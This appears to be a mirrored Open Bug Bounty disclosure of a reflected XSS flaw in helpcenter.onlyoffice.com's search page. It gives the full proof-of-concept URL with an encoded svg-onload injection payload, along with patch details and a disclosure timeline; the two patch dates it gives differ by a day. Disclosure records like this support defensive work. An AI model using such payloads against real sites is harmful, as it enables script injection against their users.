Lucene search
BesafeCybersecurityOBB:111530HistoryDec 01, 2015 - 7:01 p.m.
helpcenter.onlyoffice.com XSS vulnerability
2015-12-0119:01:00
BesafeCybersecurity
www.openbugbounty.org
8
Vulnerable URL:
http://helpcenter.onlyoffice.com/search.aspx?text=999%22%3E%3Csvg%2Fonload%3Dprompt%28%2FXSSPOSED%2F%29%3E
Details:
| Description | Value |
|---|---|
| Patched: | Yes, at 23.02.2016 |
| Latest check for patch: | 23.02.2016 19:22 GMT |
| Vulnerability type: | XSS |
| Vulnerability status: | Publicly disclosed |
| Alexa Rank | Unknown / Not calculated |
| Google Pagerank | 0 |
| VIP website status: | No |
| Check helpcenter.onlyoffice.com SSL connection: | (Grade: A) |
Coordinated Disclosure Timeline:
| Description | Value |
|---|---|
| Vulnerability reported | 1 December, 2015 19:01 GMT |
| Vulnerability existence verified and confirmed | 1 December, 2015 19:04 GMT |
| Vulnerability details disclosed by researcher | 23 February, 2016 19:11 GMT |
| Vulnerability patched by the website owner | 24 February, 2016 11:24 GMT |